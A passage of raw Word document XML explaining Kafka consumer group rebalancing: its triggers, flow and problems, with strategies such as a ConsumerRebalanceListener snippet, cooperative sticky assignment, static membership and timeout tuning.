          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or when </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topics/partitions change</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F029E59" w14:textId="77777777" w:rsidR="008C5CA5"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AC9F957">
          <v:rect id="_x0000_i3280" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42818636" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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When Rebalancing Happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E06A333" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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A </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer joins</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAFD6B5" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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A </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer leaves</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fails</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CCCF44" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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New partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are added to the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07386B07" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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The </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscription changes</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (new topics added or removed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6EA0D2" w14:textId="77777777" w:rsidR="008C5CA5"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16F5227">
          <v:rect id="_x0000_i3281" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="211C5163" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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lastRenderedPageBreak/>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rebalance Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566B062D" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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The </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>group coordinator</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> detects a change in the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D8C390" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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It </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pauses consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for all consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D355A3" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Partitions are </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reassigned</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to available consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36891E64" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Consumers are notified of their </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new partition assignments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455FA371" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Consumers </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resume</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processing from the last committed offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010DF9FA" w14:textId="77777777" w:rsidR="008C5CA5"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6AF69F3">
          <v:rect id="_x0000_i3282" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="103B89B8" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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Problems With Frequent Rebalancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571F1D87" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Temporary </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service interruption</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (no message consumption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCA689" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Potential </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message duplication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>loss</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if offsets aren't managed correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DB9DF" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Increased latency</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and resource usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E093A0" w14:textId="77777777" w:rsidR="008C5CA5"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806991">
          <v:rect id="_x0000_i3283" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C4561" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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Strategies to Handle Rebalance in Large-Scale Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E756D" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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1. Use ConsumerRebalanceListener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FBB29C"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Implement this listener to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFFE69D" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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ommit offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before partitions are revoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673EC3A3" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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eek to specific offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on reassignment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE443AA"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nsumer.subscribe(List.of("topic"), new ConsumerRebalanceListener() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6904CFD6"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    public void onPartitionsRevoked(Collection&lt;TopicPartition&gt; partitions) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A620FA"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        // Save offsets or cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C07AA"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CECD84"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    public void onPartitionsAssigned(Collection&lt;TopicPartition&gt; partitions) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AF02BE"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        // Restore offsets or state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08F8EF"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F42AE5C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C27C879" w14:textId="77777777" w:rsidR="008C5CA5"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35EB4CC">
          <v:rect id="_x0000_i3284" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D42CDFC" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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2. Enable Cooperative Rebalancing (Kafka 2.4+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E4F21F"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Use CooperativeStickyAssignor to avoid full-stop rebalancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3829643B"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artition.assignment.strategy=org.apache.kafka.clients.consumer.CooperativeStickyAssignor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F70486" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Minimal disruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D756164" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Keeps </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition stickiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B263BEE" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>incremental rebalancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D5E404" w14:textId="77777777" w:rsidR="008C5CA5"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34AB6C7">
          <v:rect id="_x0000_i3285" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C993D06" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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3. Use Static Group Membership (Kafka 2.3+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC70BA3"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Assign a fixed ID to each consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68163AD0"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group.instance.id=consumer-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DB2C28" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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revents rebalancing when consumer restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E39D844" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Useful for </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>long-running</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateful</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2A8B76" w14:textId="77777777" w:rsidR="008C5CA5"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4529A67">
          <v:rect id="_x0000_i3286" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4734F0EE" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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4. Tune Consumer Config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74"/>
        <w:gridCol w:w="3391"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="13CB8C7F" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="550BA3BD" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A957C3A" w14:textId="77777777" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="4AA8A9F8" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02D9AC4C"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ession.timeout.ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73B39003"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ime to detect consumer failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="028BBBF8" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="438D68A2"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heartbeat.interval.ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22F3EB04"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Heartbeat frequency to broker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="202EA9A5" w14:textId="77777777" w:rsidTr="008C5CA5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45B6BF75"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ax.poll.interval.ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EDBC559"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ime allowed between poll calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="392EEF44"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Proper tuning prevents </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>false rebalancing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to slow processing or missed heartbeats.</w:t>
      </w:r>
    </w:p>
